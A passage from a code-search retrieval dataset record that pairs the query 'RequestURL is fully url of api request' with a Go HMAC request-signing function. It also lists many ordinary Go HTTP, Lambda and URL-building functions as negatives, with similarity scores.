500)\n\t\treturn\n\t}\n\n\treq := json.GetRPCRequestFromJSON(string(b))\n\trespBody, statusCode := handler(req)\n\tw.WriteHeader(statusCode)\n\tw.Write([]byte(respBody))\n}", "func (p *ProxyHandler) handleInRequest(src grpc.ServerStream, dst grpc.ClientStream) error {\n\tmethodName, ok := grpc.MethodFromServerStream(src)\n\tif !ok {\n\t\treturn grpc.Errorf(codes.Internal, \"lowLevelServerStream not exists in context\")\n\t}\n\n\tcfg, ok := p.cfgManager.GetPartitionCfg()\n\tif ok && len(cfg.Ingress) > 0 {\n\t\tif err := p.processIngressNetwork(src, dst, cfg); err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn nil\n\t}\n\n\trule, ok := p.cfgManager.GetFailpointCfg(methodName)\n\tif !ok {\n\t\treturn p.processNormal(src, dst)\n\t}\n\n\treturn p.processWithRule(src, dst, rule)\n}", "func Handler(ctx context.Context, request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\tvar buf bytes.Buffer\n\n\tbody, err := json.Marshal(map[string]interface{}{\n\t\t\"message\": \"Okay so your other function also executed successfully!\",\n\t})\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 404}, err\n\t}\n\tjson.HTMLEscape(&buf, body)\n\n\tresp := events.APIGatewayProxyResponse{\n\t\tStatusCode: 200,\n\t\tIsBase64Encoded: false,\n\t\tBody: buf.String(),\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t\t\"X-MyCompany-Func-Reply\": \"world-handler\",\n\t\t},\n\t}\n\n\treturn resp, nil\n}", "func handleRequests() {\n\tmyRouter := mux.NewRouter().StrictSlash(true)\n\tmyRouter.HandleFunc(\"/twoSidePrime/{num}\", isTwoSidePrime)\n\tlog.Fatal(http.ListenAndServe(\":8082\", myRouter))\n}", "func (d *Delete) HandleRequest(req *web.Request, res *web.Response) {\n\tresp := fmt.Sprintf(\"your method is [%s].\\n\", req.Method)\n\tres.WriteString(resp)\n\tres.Flush()\n}", "func HandleRequest(m types.Message) (types.Response, error) {\n\n\tif m.Type != \"get-todo\" {\n\t\te := util.CreateResponse(\"get-todo-response\", \"NOK\", \"Handling incorrect message type - ignoring...\", \"\")\n\t\treturn e, nil\n\t}\n\n\ttableName = os.Getenv(\"TABLE_NAME\")\n\n\tidString := m.Data\n\tif idString == \"\" {\n\t\treturn util.CreateResponse(\"get-todo-response\", \"NOK\", \"No ID provided\", \"\"), nil\n\t}\n\n\tid, _ := uuid.Parse(idString)\n\tt, _ := GetTodo(id)\n\t// TODO(murp): add error checking here\n\n\ttbody, _ := json.Marshal(t)\n\treturn util.CreateResponse(\"get-todo-response\", \"OK\", \"\", string(tbody)), nil\n}", "func HandleRequest(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\tif request.HTTPMethod == \"GET\" {\n\t\tif request.Headers[\"objectkeys\"] == \"\" || request.Headers[\"bucketname\"] == \"\" || request.Headers[\"region\"] == \"\" {\n\t\t\tAPIResponse := events.APIGatewayProxyResponse{Body: \"{\\\"message\\\": \\\"Headers Parameters: [objectkeys, bucketname, region] all values are required\\\"}\", StatusCode: 400}\n\t\t\treturn APIResponse, nil\n\t\t}\n\t\tfmt.Println(\"Deleting\", request.Headers[\"objectkeys\"], \" from Bucket\", request.Headers[\"bucketname\"])\n\t\tobjectkeys := strings.Split(request.Headers[\"objectkeys\"], \",\")\n\t\t_, err := s3.DeleteObjects(request.Headers[\"region\"], request.Headers[\"bucketname\"], objectkeys)\n\t\tif err != nil {\n\t\t\tfmt.Println(err.Error())\n\t\t\tAPIResponse := events.APIGatewayProxyResponse{Body: \"{\\\"message\\\": \\\"\" + err.Error() + \"\\\"}\", StatusCode: 502}\n\t\t\treturn APIResponse, nil\n\t\t}\n\t\tAPIResponse := events.APIGatewayProxyResponse{Body: \"{\\\"message\\\": \\\"\" + request.Headers[\"objectkeys\"] + \" deleted from bucket \" + request.Headers[\"bucketname\"] + \"\\\"}\", StatusCode: 200, IsBase64Encoded: true}\n\t\treturn APIResponse, nil\n\t}\n\tAPIResponse := events.APIGatewayProxyResponse{Body: \"{\\\"message\\\": \\\"Method Not Allowed!\\\"}\", StatusCode: 405}\n\treturn APIResponse, nil\n}", "func HandleRequest(ctx context.Context, waitEvent WaitEvent) (string, error) {\n\tfmt.Printf(\"Waiting for token (logged to cloudwatch) %v\", waitEvent.Token)\n\t// This could email out this token as a URL to click on in an Email.\n\treturn fmt.Sprintf(\"Waiting for token %v\", waitEvent.Token), nil\n}", "func (h *myHandler) Handle(ctx context.Context, c *jsonrpc2.Conn, r *jsonrpc2.Request) {\n\tswitch r.Method {\n\tcase \"sayHello\":\n\t\tif err := c.Reply(ctx, r.ID, \"hello world\"); err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn\n\t\t}\n\tdefault:\n\t\terr := &jsonrpc2.Error{Code: jsonrpc2.CodeMethodNotFound, Message: \"Method not found\"}\n\t\tif err := c.ReplyWithError(ctx, r.ID, err); err != nil {\n\t\t\tlog.Println(err)\n\t\t\treturn\n\t\t}\n\t}\n}", "func (s *Standard) sendRequest(context service.Context, requestMethod string, requestURL string, responseObject interface{}) error {\n\n\tserverToken := s.serverToken()\n\tif serverToken == \"\" {\n\t\treturn errors.Newf(\"client\", \"unable to obtain server token for %s %s\", requestMethod, requestURL)\n\t}\n\n\trequest, err := http.NewRequest(requestMethod, requestURL, nil)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"client\", \"unable to create new request for %s %s\", requestMethod, requestURL)\n\t}\n\n\tif err = service.CopyRequestTrace(context.Request(), request); err != nil {\n\t\treturn errors.Wrapf(err, \"client\", \"unable to copy request trace\")\n\t}\n\n\trequest.Header.Add(TidepoolAuthenticationTokenHeaderName, serverToken)\n\n\tresponse, err := s.httpClient.Do(request)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"client\", \"unable to perform request %s %s\", requestMethod, requestURL)\n\t}\n\tdefer response.Body.Close()\n\n\tswitch response.StatusCode {\n\tcase http.StatusOK:\n\t\tif responseObject != nil {\n\t\t\tif err = json.NewDecoder(response.Body).Decode(responseObject); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"client\", \"error decoding JSON response from %s %s\", request.Method, request.URL.String())\n\t\t\t}\n\t\t}\n\t\treturn nil\n\tcase http.StatusUnauthorized:\n\t\treturn NewUnauthorizedError()\n\tdefault:\n\t\treturn NewUnexpectedResponseError(response, request)\n\t}\n}", "func (d *Dependencies) HandleRequest(req events.APIGatewayV2HTTPRequest) (events.APIGatewayV2HTTPResponse, error) {\n\n\tvar response events.APIGatewayV2HTTPResponse\n\tvar regionNodeResponse RegionNodeResponse\n\n\tvar request RegionRequest\n\n\tif(req.QueryStringParameters == nil){\n\t\tresponse.StatusCode = 500\n\t\ts := []string{fmt.Sprint(\"Oh noes!\")}\n\t\tregionNodeResponse.Errors = s\n\n\t\tb, _ := json.Marshal(regionNodeResponse)\n\t\tresponse.Body = string(b)\n\n\t\treturn response, errors.New(\"error \")\n\t}\n\n\treqMap := req.QueryStringParameters;\n\tfmt.Print(reqMap);\n\n\trequest.LevelType = reqMap[\"lvl\"]\n\trequest.RegionID = reqMap[\"rgn\"]\n\n\tif(request.LevelType == \"\" || request.RegionID == \"\"){\n\t\t//Bad request.\t\n\t\tresponse.StatusCode = 400\n\t\tb, _ := json.Marshal(response)\n\t\tresponse.Body = \"Bad request, missing params\" + string(b)\n\n\n\t}\n\n\t// Request items from DB.\n\tdb := d.ddb\n\ttable := d.tableID\n\n\tregionNodeResponse = getData(request, db, table)\n\t\n\tb, err := json.Marshal(regionNodeResponse)\n\n\tif err != nil {\n\t\tfmt.Println(\"Error with marshalling request\")\n\t\tresponse.StatusCode = 500\n\t\ts := []string{fmt.Sprint(err)}\n\t\tregionNodeResponse.Errors = s\n\n\t} else {\n\t\tresponse.Body = string(b)\n\t\tresponse.StatusCode = 200\n\t}\n\n\treturn response, nil\n}", "func (r *relay) handleTunnelRequest(tmpId uint64, buf int) {\n\tif tun, err := r.acceptTunnel(tmpId, buf); err == nil {\n\t\tr.handler.HandleTunnel(tun)\n\t} else {\n\t\tlog.Printf(\"iris: failed to accept inbound tunnel: %v.\", err)\n\t}\n}", "func HandleRequest(request Event) error {\n\tparams := config.ParseParams()\n\tgithubAPI := &github.APIService{BaseURL: params.GithubBaseURL, Token: params.GithubToken, Client: http.DefaultClient}\n\tslackAPI := &notification.SlackService{Client: http.DefaultClient}\n\n\tbranchService := &service.BranchService{\n\t\tParams: params,\n\t\tAPI: githubAPI,\n\t\tMsg: slackAPI,\n\t\tWg: &sync.WaitGroup{},\n\t}\n\n\t// first check validation token\n\ttoken := request.Query[\"token\"]\n\tif token != params.SlackCommandToken {\n\t\treturn errors.New(\"Incorrect validation token\")\n\t}\n\n\t// then check for respose webhook url\n\tresponseURL := request.Query[\"response_url\"]\n\tif responseURL == \"\" {\n\t\treturn errors.New(\"No response_url provided\")\n\t}\n\n\t// provide response to stop slack command from timing out\n\tslackAPI.Notify(responseURL, \"Processing request...\")\n\n\t// do branch check\n\tif message := branchService.GenerateStatusMessage(); message != \"\" {\n\t\tslackAPI.Notify(responseURL, message)\n\t\treturn nil\n\t}\n\n\terrorMsg := \"Error occurred while processing request\"\n\n\tslackAPI.Notify(responseURL, errorMsg)\n\treturn errors.New(errorMsg)\n}", "func (h HTTPHandlerFunc) HandleRequest(c context.Context, fc *fasthttp.RequestCtx) error {\n\treturn h(c, fc)\n}", "func HandleRequests(collection *mongo.Collection, port string) {\n router := gin.Default()\n\n\trouter.GET(\"/\", homePage)\n\n\trouter.POST(\"/add/users\", func(c *gin.Context) {Controller.AddUser(c, collection)})\n\trouter.POST(\"/login\", func(c *gin.Context) {Controller.LogUser(c, collection)})\n\n\trouter.DELETE(\"/delete/user/:id\", func(c *gin.Context) {Controller.DelUser(c, collection)})\n\n\trouter.GET(\"user/:id\", func(c *gin.Context) {Controller.GetUser(c, collection)})\n\trouter.GET(\"/users/list\", func(c *gin.Context) {Controller.GetUsers(c, collection)})\n\n\t//Put method remplace method UPDATE\n\trouter.PUT(\"user/:id\", func(c *gin.Context) {Controller.PutUser(c, collection)})\n \n router.Run(\":\" + port)\n}", "func Handle(req []byte) string {\n\twebhook, err := ioutil.ReadFile(\"/var/openfaas/secrets/webhook-url\")\n\twebhookURL := string(webhook)\n\tif err != nil {\n\t\treturn fmt.Sprintf(\"Unable to read secret file\")\n\t}\n\n\tpayload := Payload{Text: string(req)}\n\treqPayload, err := json.Marshal(payload)\n\tif err != nil {\n\t\treturn fmt.Sprintf(\"Unable to marshal\")\n\t}\n\treader := bytes.NewReader(reqPayload)\n\n\tclient := http.Client{}\n\trequest, _ := http.NewRequest(http.MethodPost, webhookURL, reader)\n\t_, err = client.Do(request)\n\tif err != nil {\n\t\treturn fmt.Sprintf(\"Unable to send message\")\n\t}\n\n\treturn fmt.Sprintf(\"Message sent successfully\")\n}", "func (recv *Receiver) handle(req Request, event cloudevents.Event) error {\n\n\terr := recv.s3ification(req.Description, event)\n\tif err != nil {\n\t\trecv.logger.Errorw(\"and error occured posting to s3 \", zap.Error(err))\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func HandleRequest(ctx context.Context, event events.APIGatewayProxyRequest) (\n\tevents.APIGatewayProxyResponse, error) {\n\n\t// make sure content-type is set to application/json\n\t// (any text type is fine, but can cause problems if no type specified)\n\tif event.Headers[\"content-type\"] != \"application/json\" {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: \"Request content-type header must be application/json.\",\n\t\t\tStatusCode: 400,\n\t\t}, nil\n\t}\n\n\t// make sure input json is valid\n\tvar payload PresignEvent\n\terr := json.Unmarshal([]byte(event.Body), &payload)\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: \"Invalid JSON.\",\n\t\t\tStatusCode: 400,\n\t\t}, nil\n\t}\n\n\t// make sure key is specified\n\tif payload.Key == \"\" && payload.Type == \"GET\" {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: \"Input field 'key' must not be empty for GET request.\",\n\t\t\tStatusCode: 400,\n\t\t}, nil\n\t}\n\n\t// make sure type is specified\n\tpayload.Type = strings.ToUpper(payload.Type)\n\tif payload.Type != \"PUT\" && payload.Type != \"GET\" {\n\t\treturn events.APIGatewayProxyResponse{\n\t\t\tBody: \"Input field 'type' must be 'PUT' or 'GET'.\",\n\t\t\tStatusCode: 400,\n\t\t}, nil\n\t}\n\n\tif payload.Type == \"PUT\" {\n\t\treturn getPresignedPutUrl(event, payload)\n\t}\n\treturn getPresignedGetUrl(event, payload)\n}", "func (s server) Handle(w http.ResponseWriter, r *http.Request) {\n\t/* If we have creds set, check them */\n\tif \"\" != s.username || \"\" != s.password {\n\t\tw.Header().Set(\n\t\t\t\"WWW-Authenticate\",\n\t\t\t`Basic realm=\"Auth Required\"`,\n\t\t)\n\t\tu, p, ok := r.BasicAuth()\n\t\tif !ok || (\"\" == u && \"\" == p) { /* Client didn't know? */\n\t\t\tlog.Printf(\"[%v] No auth\", r.RemoteAddr)\n\t\t\thttp.Error(w, \"Not authorized\", 401)\n\t\t\treturn\n\t\t}\n\t\tif u != s.username || p != s.password {\n\t\t\tlog.Printf(\n\t\t\t\t\"[%s] Auth fail (%q / %q)\",\n\t\t\t\tr.RemoteAddr,\n\t\t\t\tu,\n\t\t\t\tp,\n\t\t\t)\n\t\t\thttp.Error(w, \"Not authorized\", 401)\n\t\t\treturn\n\t\t}\n\t}\n\n\tlogReq(r)\n\n\t/* Special cases sometimes */\n\tswitch r.Method {\n\tcase http.MethodDelete: /* We may not allow deletes */\n\t\tif s.noDelete {\n\t\t\treturn\n\t\t}\n\tcase http.MethodGet: /* Maybe serve a single file */\n\t\tif \"\" != s.serveFile {\n\t\t\thttp.ServeFile(w, r, s.serveFile)\n\t\t\treturn\n\t\t}\n\t}\n\n\t/* If we're only allowing read access, whitelist the allowed methods */\n\tif s.readOnly {\n\t\tswitch r.Method {\n\t\tcase \"OPTIONS\", \"GET\", \"HEAD\", \"PROPFIND\":\n\t\t\t/* These are ok */\n\t\tdefault:\n\t\t\t/* This is not ok */\n\t\t\treturn\n\t\t}\n\t}\n\n\ts.w.ServeHTTP(w, r)\n}", "func (h *Handler) serveDeleteServer(w http.ResponseWriter, r *http.Request) {}", "func Handler(req events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t// If no name is provided in the HTTP request body, throw an error\n\treturn chiLambda.Proxy(req)\n}", "func handleRequest(req string) string {\n\tresponse := \"\"\n\n\tif len(req) > 0 {\n\t\ts := strings.Split(req, \":\")\n\t\tif len(s) < 2 {\n\t\t\tresponse = \"0001:Invalid request\"\n\t\t} else {\n\t\t\tresponse = processRequest(s[0], s[1])\n\t\t}\n\t} else {\n\t\tresponse = \"0000:Empty request\"\n\t}\n\n\treturn response\n}", "func Handler(request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\n\tbodyEvent := MyEvent{}\n\n\t// Unmarshal the json, return 404 if error\n\terr := json.Unmarshal([]byte(request.Body), &bodyEvent)\n\tif err != nil {\n\t\tlog.Println(\"Failed run: \", err)\n\t\treturn events.APIGatewayProxyResponse{Body: err.Error(), StatusCode: 404}, nil\n\t}\n\n\t// stdout and stderr are sent to AWS CloudWatch Logs\n\tlog.Printf(\"Processing Lambda request %s\\n\", bodyEvent.User)\n\n\tvar result string\n\tfor _, v := range bodyEvent.Message {\n\t\tresult = string(v) + result\n\t}\n\n\tresponse := map[string]string{\"message\": \"Hello \" + bodyEvent.User + \", \" + result}\n\n\t//marshall output\n\tjsonString, err := json.Marshal(response)\n\tif err != nil {\n\t\tlog.Printf(\"error: %s \\n\", err)\n\t\treturn events.APIGatewayProxyResponse{}, ErrJsonEncode\n\t}\n\n\treturn events.APIGatewayProxyResponse{\n\t\tBody: string(jsonString),\n\t\tStatusCode: 200,\n\t}, nil\n\n}", "func routePath(w http.ResponseWriter, r *http.Request, trimURL string) {\n\n\t/***********************************************/\n\t//TODO: add your custom web API here:\n\t/**********************************************/\n\n\tif strings.HasPrefix(trimURL, \"login\") && webServer.IsPOST(r) { //>>>>authentication\n\t\tauthenticateHandler.HandleHTTPLogin(w, r)\n\t} else if strings.HasPrefix(trimURL, \"logout\") && webServer.IsPOST(r) {\n\t\tauthenticateHandler.HandleHTTPLogout(w, r)\n\t} else if strings.Compare(trimURL, \"current-user\") == 0 && webServer.IsGET(r) {\n\t\tauthenticateHandler.HandleCurrentUser(w, r)\n\t} else if strings.Compare(trimURL, \"role\") == 0 && webServer.IsPOST(r) { //>>>>authorization\n\t\tauthorizeHandler.HandleAddRole(w, r)\n\t} else if strings.Compare(trimURL, \"role\") == 0 && webServer.IsGET(r) {\n\t\tauthorizeHandler.HandleGetRole(w, r)\n\t} else if strings.Compare(trimURL, \"role-access\") == 0 && webServer.IsGET(r) {\n\t\tauthorizeHandler.HandleGetAccessRole(w, r)\n\t} else if strings.Compare(trimURL, \"role-access-count\") == 0 && webServer.IsGET(r) {\n\t\tauthorizeHandler.HandleGetAccessRoleCount(w, r)\n\t} else if strings.Compare(trimURL, \"access\") == 0 && webServer.IsGET(r) {\n\t\tauthorizeHandler.HandleGetAccess(w, r)\n\t} else if strings.HasPrefix(trimURL, \"meals\") { //>>>>sample return JSON\n\t\tw.Header().Set(\"Content-Type\", \"application/json\") //MIME to application/json\n\t\tw.WriteHeader(http.StatusOK) //status code 200, OK\n\t\tw.Write([]byte(\"{ \\\"msg\\\": \\\"this is meal A \\\" }\")) //body text\n\t\treturn\n\t} else if strings.HasPrefix(trimURL, \"img/\") { //>>>>sample return virtual JPG file to client\n\t\tlogicalFilePath := \"./logic-files/\"\n\t\tphysicalFileName := \"neon.jpg\"\n\n\t\t// try read file\n\t\tdata, err := ioutil.ReadFile(logicalFilePath + physicalFileName)\n\t\tif err != nil {\n\t\t\t// show error page if failed to read file\n\t\t\thandleErrorCode(500, \"Unable to retrieve image file\", w)\n\t\t} else {\n\t\t\t//w.Header().Set(\"Content-Type\", \"image/jpg\") // #optional HTTP header info\n\n\t\t\t// uncomment if image file is meant to download instead of display on web browser\n\t\t\t// clientDisplayFileName = \"customName.jpg\"\n\t\t\t//w.header().Set(\"Content-Disposition\", \"attachment; filename=\\\"\" + clientDisplayFileName + \"\\\"\")\n\n\t\t\t// write file (in binary format) direct into HTTP return content\n\t\t\tw.Write(data)\n\t\t}\n\t} else {\n\t\t// show error code 404 not found\n\t\t//(since the requested URL doesn't match any of it)\n\t\thandleErrorCode(404, \"Path not found.\", w)\n\t}\n\n}" ]
[ "0.6640558", "0.66235113", "0.6565479", "0.6397091", "0.63218373", "0.62982833", "0.6265546", "0.62301195", "0.61600935", "0.6144936", "0.61446214", "0.6121695", "0.60812634", "0.60582167", "0.6057404", "0.6045403", "0.603662", "0.60364103", "0.60210156", "0.60132045", "0.5997755", "0.59761304", "0.59694076", "0.5963691", "0.5953454", "0.59260267", "0.5922957", "0.59221405", "0.59114075", "0.5908723", "0.5897531", "0.58831024", "0.5878762", "0.5854218", "0.58406585", "0.58359265", "0.5826487", "0.582077", "0.5813011", "0.58069986", "0.57968724", "0.5784979", "0.5784707", "0.5783906", "0.5782076", "0.5767125", "0.57536745", "0.57315207", "0.573108", "0.5711822", "0.57090807", "0.5694326", "0.56877637", "0.5679731", "0.5676155", "0.56760776", "0.56738734", "0.5666559", "0.56572616", "0.5640883", "0.5638496", "0.56351584", "0.56175494", "0.5612599", "0.5611072", "0.5610436", "0.56098753", "0.5607337", "0.5604728", "0.55829465", "0.5578178", "0.5575207", "0.55661297", "0.5563048", "0.55584574", "0.5557507", "0.55565774", "0.55546856", "0.555427", "0.55470896", "0.5546803", "0.55466837", "0.55358905", "0.55337024", "0.553071", "0.5528867", "0.5528606", "0.5516521", "0.5500278", "0.5494442", "0.54916286", "0.54848194", "0.5484614", "0.5480753", "0.54771507", "0.5471214", "0.54704", "0.54692405", "0.5465951", "0.5465242", "0.54638684" ]
0.0
-1
RequestURL is fully url of api request
func sign(req *http.Request, accessKey, secretKey, signName string) { if accessKey == "" { return } toSign := req.Method + "\n" for _, n := range HEADER_NAMES { toSign += req.Header.Get(n) + "\n" } bucket := strings.Split(req.URL.Host, ".")[0] toSign += "/" + bucket + req.URL.Path h := hmac.New(sha1.New, []byte(secretKey)) _, _ = h.Write([]byte(toSign)) sig := base64.StdEncoding.EncodeToString(h.Sum(nil)) token := signName + " " + accessKey + ":" + sig req.Header.Add("Authorization", token) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (ep *EndpointConfig) RequestURL() string {\n\tif ep.RequestMethod() == \"GET\" {\n\t\tbaseURL, _ := url.Parse(expandFakes(config.ExpandString(ep.Url)))\n\t\tparams := url.Values{}\n\t\tfor k, v := range ep.GetRequestParams() {\n\t\t\tparams.Add(k, v)\n\t\t}\n\t\tbaseURL.RawQuery = params.Encode()\n\t\treturn baseURL.String()\n\t} else {\n\t\treturn ep.GetString(\"url\")\n\t}\n}", "func (c *Client) requestURL(method, endpointURL string) *url.URL {\n\tendpoint, _ := url.Parse(endpointURL)\n\ttimestamp := strconv.FormatInt(time.Now().Unix(), 10)\n\thash := c.generateHash(method, endpoint.Path, timestamp)\n\n\tq := endpoint.Query()\n\tq.Set(\"apiuserid\", c.APIUserID)\n\tq.Set(\"timestamp\", timestamp)\n\tq.Set(\"hash\", hash)\n\tendpoint.RawQuery = q.Encode()\n\n\treturn c.BaseURL.ResolveReference(endpoint)\n}", "func RequestURL(req *http.Request) model.URL {\n\tfullHost := req.Host\n\tif fullHost == \"\" {\n\t\tfullHost = req.URL.Host\n\t}\n\thost, port, err := net.SplitHostPort(fullHost)\n\tif err != nil {\n\t\thost = fullHost\n\t\tport = \"\"\n\t}\n\tout := model.URL{\n\t\tHostname: host,\n\t\tPort: port,\n\t\tPath: req.URL.Path,\n\t\tSearch: req.URL.RawQuery,\n\t\tHash: req.URL.Fragment,\n\t}\n\tif req.URL.Scheme != \"\" {\n\t\t// If the URL contains user info, remove it before formatting\n\t\t// so it doesn't make its way into the \"full\" URL, to avoid\n\t\t// leaking PII or secrets.\n\t\tuser := req.URL.User\n\t\treq.URL.User = nil\n\t\tout.Full = req.URL.String()\n\t\tout.Protocol = req.URL.Scheme\n\t\treq.URL.User = user\n\t} else {\n\t\t// Server-side, req.URL contains the\n\t\t// URI only. We synthesize the URL\n\t\t// by adding in req.Host, and the\n\t\t// scheme determined by the presence\n\t\t// of TLS configuration.\n\t\tscheme := \"http\"\n\t\tif req.TLS != nil {\n\t\t\tscheme = \"https\"\n\t\t}\n\t\tu := *req.URL\n\t\tu.Scheme = scheme\n\t\tu.User = nil\n\t\tu.Host = fullHost\n\t\tout.Full = u.String()\n\t\tout.Protocol = scheme\n\t}\n\treturn out\n}", "func (r *BaseRequest) URL() string {\n\tvar query string\n\tif r.query != nil {\n\t\tquery = \"?\" + r.query.Encode()\n\t}\n\treturn r.baseURL + query\n}", "func (t *Tracker) getURL(r *request) string {\n\treturn baseURL + t.serviceID + r.String()\n}", "func (l *Lambda) RequestURL() *url.URL {\n\treturn l.r.URL\n}", "func fullRequestURL(r *http.Request) string {\n\turl := r.URL.String()\n\n\tif pos := strings.LastIndexByte(url, '#'); pos >= 0 {\n\t\turl = url[:pos]\n\t}\n\n\tserver := config.GetString(\"/app/server\", \"\")\n\tif server == \"\" {\n\t\treturn url\n\t}\n\tif l := len(server); server[l-1] == '/' {\n\t\tserver = server[:l-1]\n\t}\n\n\tpos := strings.Index(url, \"://\")\n\tif pos == -1 {\n\t\treturn server + url\n\t}\n\n\turl = url[pos+3:]\n\tif pos = strings.IndexByte(url, '/'); pos >= 0 {\n\t\treturn server + url[pos:]\n\t}\n\n\treturn server\n}", "func (session *Session) getRequestUrl(path string, params Params) string {\n\tif params == nil {\n\t\tparams = Params{}\n\t}\n\n\tparams[\"company_id\"] = session.companyId\n\tparams[\"company_token\"] = session.companyToken\n\tparams[\"app_id\"] = session.app.AppId\n\tparams[\"oauth_version\"] = 2\n\n\tif _, exist := params[\"open_id\"]; !exist && session.OpenId != \"\" {\n\t\tparams[\"open_id\"] = session.OpenId\n\t}\n\n\tif _, exist := params[\"client_ip\"]; !exist {\n\t\tif session.ClientIP != \"\" {\n\t\t\tparams[\"client_ip\"] = session.ClientIP\n\t\t} else {\n\t\t\tparams[\"client_ip\"] = session.app.ClientIP\n\t\t}\n\t}\n\n\treturn session.getUrl(path, params)\n}", "func (o WebTestPropertiesRequestOutput) RequestUrl() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestPropertiesRequest) *string { return v.RequestUrl }).(pulumi.StringPtrOutput)\n}", "func (o WebTestPropertiesResponseRequestOutput) RequestUrl() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestPropertiesResponseRequest) *string { return v.RequestUrl }).(pulumi.StringPtrOutput)\n}", "func (c Client) getURL(url string) string {\n\treturn fmt.Sprintf(\"%s%s\", c.baseAPI, url)\n}", "func (input *Input) URL() string {\n\treturn input.Context.Request.URL.Path\n}", "func RequestURL(base, router string) string {\n\tvar buf bytes.Buffer\n\tif l := len(base); l > 0 {\n\t\tif base[l-1] == '/' {\n\t\t\tbase = base[:l-1]\n\t\t}\n\t\tbuf.WriteString(base)\n\n\t\tif rl := len(router); rl > 0 {\n\t\t\tif router[0] != '/' {\n\t\t\t\tbuf.WriteByte('/')\n\t\t\t}\n\t\t}\n\t}\n\tbuf.WriteString(router)\n\treturn buf.String()\n}", "func (a API) URL() string {\n\treturn fmt.Sprintf(\"%s://%s:%s/%s\", a.Schema, a.Host, a.Port, a.APIPrefix)\n}", "func (c *httpClient) URL() string {\n\treturn c.config.URL.String()\n}", "func (rc RequestCall) GetRequestURL() url.URL {\n\t// Original URL does not have scheme and hostname in it, so we need to add it.\n\t// Ref: https://github.com/golang/go/issues/28940\n\turl := *rc.Request.URL\n\turl.Scheme = rc.GetScheme()\n\turl.Host = rc.GetHostname()\n\n\treturn url\n}", "func (r *Request) url() (*url.URL, error) {\n\n\turlString := stewstrings.MergeStrings(r.session.host(), common.PathSeparator, r.path)\n\n\ttheURL, urlErr := url.Parse(urlString)\n\n\tif urlErr != nil {\n\t\treturn nil, urlErr\n\t}\n\n\t// set the query values\n\ttheURL.RawQuery = r.queryValues.Encode()\n\n\turlString = theURL.String()\n\n\tif strings.Contains(urlString, \"?\") {\n\t\turlString = stewstrings.MergeStrings(urlString, \"&\", common.ParameterAPIKey, \"=\", r.session.apiKey)\n\t} else {\n\t\turlString = stewstrings.MergeStrings(urlString, \"?\", common.ParameterAPIKey, \"=\", r.session.apiKey)\n\t}\n\n\ttheURL, urlErr = url.Parse(urlString)\n\n\tif urlErr != nil {\n\t\treturn nil, urlErr\n\t}\n\n\treturn theURL, nil\n\n}", "func (input *BeegoInput) URL() string {\n\treturn input.Context.Request.URL.Path\n}", "func (dm *Datamuse) URL() string {\n\treturn dm.apiURL.String()\n}", "func (r CampaignRequest) URL() string {\n\treturn fmt.Sprintf(\"v3/campaigns/%d\", r.ID)\n}", "func (c *Call) URL() *url.URL {\n\treturn c.req.URL\n}", "func (m *mockAPI) URL() string {\n\tif !m.isServing() {\n\t\tpanic(\"cannot retrieve endpoint from un-started server\")\n\t}\n\n\treturn m.Server.URL\n}", "func determineURL(gc *GatewayClient, opType structures.OperationType) (string, error) {\n\t// Complete URL for request\n\tvar completeURL string\n\n\t// Validate API config, base URL and version of API\n\tif gc.API.BaseURI == \"\" {\n\t\treturn \"\", errors.New(\"Gateway client's URL is empty in, API settings\")\n\t}\n\n\tif gc.API.Version == \"\" {\n\t\treturn \"\", errors.New(\"Gateway client's Version is empty in, API settings\")\n\t}\n\n\t// Try to get operation type from request data\n\tif opType == \"\" {\n\t\treturn \"\", errors.New(\"Operation type is empty. Problem in operation builder\")\n\t}\n\n\t// AS example must be like: http://url.pay.com/v55.0/sms\n\tcompleteURL = fmt.Sprintf(\"%s/v%s/%s\", gc.API.BaseURI, gc.API.Version, opType)\n\n\t// @TODO Debug print URL\n\tfmt.Println(\"REQUEST URL \" + completeURL)\n\n\treturn completeURL, nil\n}", "func (e Environment) URL() string {\r\n\treturn e.apiURL\r\n}", "func (r AssetRequest) URL() string {\n\treturn \"v3/asset\"\n}", "func (o WebTestPropertiesResponseRequestPtrOutput) RequestUrl() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *WebTestPropertiesResponseRequest) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.RequestUrl\n\t}).(pulumi.StringPtrOutput)\n}", "func (i *instance) url() string {\n\treturn i.apiURL\n}", "func BaseURL() (u url.URL) {\n\tu = *PrefixURI\n\tu.Path += \"/api/v1\"\n\treturn u\n}", "func apiURL(cmd, path string, args []string) string {\n\tif len(args) > 0 {\n\t\tvar arglist string\n\t\tfor i := 0; i < len(args); i++ {\n\t\t\targlist += fmt.Sprintf(\"&%s\", args[i])\n\t\t}\n\t\treturn fmt.Sprintf(\"http://%s/api/v0/%s?arg=%s&%s\", defaultIPFSHost, cmd, path, arglist)\n\t}\n\treturn fmt.Sprintf(\"http://%s/api/v0/%s?arg=%s\", defaultIPFSHost, cmd, path)\n}", "func (c *Client) accountRequestUrl(path string) string {\n\treturn fmt.Sprintf(\"%s/%s/%s/%s\", c.Config.BaseUrl, ACCOUNTS_PATH, c.Config.AccountId, path)\n}", "func (o WebTestPropertiesRequestPtrOutput) RequestUrl() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *WebTestPropertiesRequest) *string {\n\t\tif v == nil {\n\t\t\treturn 